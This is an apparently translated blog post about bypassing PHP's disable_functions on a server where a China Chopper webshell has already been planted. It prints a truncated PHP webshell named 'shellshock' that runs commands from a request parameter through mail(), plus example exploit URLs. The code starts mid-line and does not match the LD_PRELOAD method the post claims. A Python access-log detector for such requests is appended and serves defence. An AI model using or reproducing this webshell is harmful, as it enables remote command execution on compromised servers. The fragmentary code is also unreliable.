Bypassing disable_functions with ld_preload

Reference: https://github.com/l3m0n/Bypass_Disable_functions_Shell

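Part of the "connected with China Chopper but can't run commands" series.

Go look at phpinfo (don't ask me how; if you were able to upload a one-line webshell, phpinfo is not a problem).

Wow! That many functions are disabled. What now?

Fine, I went looking for a method.

I tried the pcntl_exec method without success, so let's bypass it with ld_preload (mail).

Enough talk, here is the shell: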

$tmp 2>&1");
	// In Safe Mode, the user may only alter environment variables whose names
	// begin with the prefixes supplied by this directive.
	// By default, users will only be able to set environment variables that
	// begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
	// PHP will let the user modify ANY environment variable!
	mail("[email protected]", "", "", "", "-bv"); // -bv so we don't actually send any mail
	$output = @file_get_contents($tmp);
	@unlink($tmp);
	if ($output != "") {
		return $output;
	} else {
		return "No output, or not vuln.";
	}

}
echo shellshock($_REQUEST["cmd"]);
?>

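Of course, this was written by an expert; the name is kept as-is.

To run a command you of course have to give its full path.

For example (prepend the site URL yourself):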

exp.php?cmd=/sbin/ifconfig

exp.php?cmd=/bin/ls

exp.php?cmd=/usr/bin/id

exp.php?cmd=/usr/bin/whoami

You're welcome~
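Requests like the ones above leave a recognizable trace in web server access logs. The following detection sketch is an added example, not part of the original post: it flags requests to .php scripts whose query parameters decode to a path in a standard binary directory. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that starts with an absolute path into a standard binary directory,
# matching the full-path style the post requires (/bin, /sbin, /usr/bin, ...).
BIN_PATH_RE = re.compile(r'^/(?:usr/(?:local/)?)?s?bin/[\w.+-]+')


def suspicious_params(log_line):
    """Return [(script, param, value)] for a .php request passing a binary path."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    if not target.path.lower().endswith(".php"):
        return []
    hits = []
    # parse_qsl percent-decodes values, so %2Fbin%2Fls is caught as well.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if BIN_PATH_RE.match(value.strip()):
            hits.append((target.path, name, value))
    return hits


def scan(lines):
    """Collect hits across all log lines, preserving order."""
    return [hit for line in lines for hit in suspicious_params(line)]


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /upload/exp.php?cmd=/usr/bin/id HTTP/1.1" 200 54',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /upload/exp.php?cmd=%2Fsbin%2Fifconfig HTTP/1.1" 200 912',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?page=/about/team HTTP/1.1" 200 3301',
    '198.51.100.4 - - [01/Jan/2024:10:01:02 +0000] "GET /static/app.js?v=/bin/ls HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    for script, param, value in scan(SAMPLE_LOG):
        print(f"{script}: parameter {param!r} carries binary path {value!r}")
```

Because the script reads `$_REQUEST`, the same parameter can also arrive in a POST body, which a standard access log does not record, so this check covers only query-string use.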
